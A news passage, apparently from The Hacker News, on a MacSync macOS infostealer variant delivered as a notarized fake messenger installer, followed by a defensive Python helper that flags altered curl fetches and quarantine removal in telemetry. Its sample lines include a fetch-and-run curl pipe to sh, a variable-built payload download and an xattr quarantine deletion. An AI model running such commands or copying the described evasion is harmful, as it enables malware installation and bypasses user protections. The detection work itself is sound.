
"Unlike earlier MacSync Stealer variants that primarily rely on drag-to-terminal or ClickFix-style techniques, this sample adopts a more deceptive, hands-off approach," Jamf researcher Thijs Xhaflaire said.
"Notably, the curl command used to retrieve the payload shows clear deviations from earlier variants," Xhaflaire explained.
"Rather than using the commonly seen -fsSL combination, the flags have been split into -fL and -sS, and additional options like --noproxy have been introduced."
"These changes, along with the use of dynamically populated variables, point to a deliberate shift in how the payload is fetched and validated, likely aimed at improving reliability or evading detection."
A new MacSync information stealer variant is distributed as a code-signed, notarized Swift application inside a disk image named zk-call-messenger-installer-3.9.2-lts.dmg hosted on zkcall[.]net/download. The signing and notarization allow the installer to run without Gatekeeper or XProtect blocking, while on-screen instructions prompt users to right-click and open the app to further bypass protections. Apple revoked the signing certificate. The Swift dropper verifies internet connectivity, enforces a roughly 3,600-second execution interval, removes quarantine attributes, validates files, and downloads an encoded script through a helper. The payload fetch uses altered curl flags (-fL and -sS, --noproxy) and dynamic variables to improve reliability or evade detection.
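As an added example (not from the article or from Jamf's research), a small Python triage helper for process-execution telemetry: it expands curl flag clusters so the split `-fL -sS` form is recognised as equivalent to `-fsSL`, and additionally flags `--noproxy`, targets built from shell variables, and removal of the quarantine attribute. The command lines and variable names are constructed placeholders, not values from the sample.

```python
import shlex

# Constructed sample command lines, as they might appear in process telemetry
# (illustrative only; not captured from the MacSync sample described above).
SAMPLE_COMMANDS = [
    "curl -fsSL https://example.invalid/install.sh | sh",
    'curl -fL -sS --noproxy "*" "$PAYLOAD_HOST/$PAYLOAD_PATH" -o "$TMPDIR/p.enc"',
    "xattr -d com.apple.quarantine '/Applications/ZK-Call Messenger.app'",
    "curl -sS https://updates.example.invalid/feed.json",
]

def split_simple_commands(cmdline):
    """Split a shell line on pipes, ';' and logical operators into argv lists (quotes respected)."""
    try:
        tokens = shlex.split(cmdline)
    except ValueError:                      # unbalanced quotes: fall back to whitespace split
        tokens = cmdline.split()
    cmds, cur = [], []
    for tok in tokens:
        if tok in ("|", ";", "&&", "||"):
            if cur:
                cmds.append(cur)
            cur = []
        else:
            cur.append(tok)
    return cmds + [cur] if cur else cmds

def curl_findings(argv):
    """Labels for one curl invocation; -fsSL and -fL -sS expand to the same flag set."""
    clusters = [t[1:] for t in argv[1:] if t.startswith("-") and not t.startswith("--") and len(t) > 1]
    flags = set("".join(clusters))
    labels = []
    if {"f", "L", "s", "S"} <= flags and len(clusters) > 1:
        labels.append("curl_split_fsSL")      # same semantics as -fsSL, spread over several tokens
    if any(t == "--noproxy" or t.startswith("--noproxy=") for t in argv):
        labels.append("curl_noproxy")         # fetch bypasses any configured system proxy
    if any("$" in t and not t.startswith("-") for t in argv[1:]):
        labels.append("curl_dynamic_target")  # URL or output path assembled from variables at run time
    return labels

def classify_command(cmdline):
    """Return sorted detection labels for one telemetry line (empty list = nothing matched)."""
    labels = set()
    for argv in split_simple_commands(cmdline):
        name = argv[0].rsplit("/", 1)[-1]     # tolerate absolute paths such as /usr/bin/curl
        if name == "curl":
            labels.update(curl_findings(argv))
        elif name == "xattr" and "com.apple.quarantine" in argv and any(
                t.startswith("-") and set(t[1:]) & {"d", "c"} for t in argv[1:]):
            labels.add("quarantine_removal")  # -d deletes the attribute, -c clears all attributes
    return sorted(labels)

def scan(commands=SAMPLE_COMMANDS):
    """Map each command line to its labels, keeping only lines that matched something."""
    return {c: classify_command(c) for c in commands if classify_command(c)}
```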
Read at The Hacker News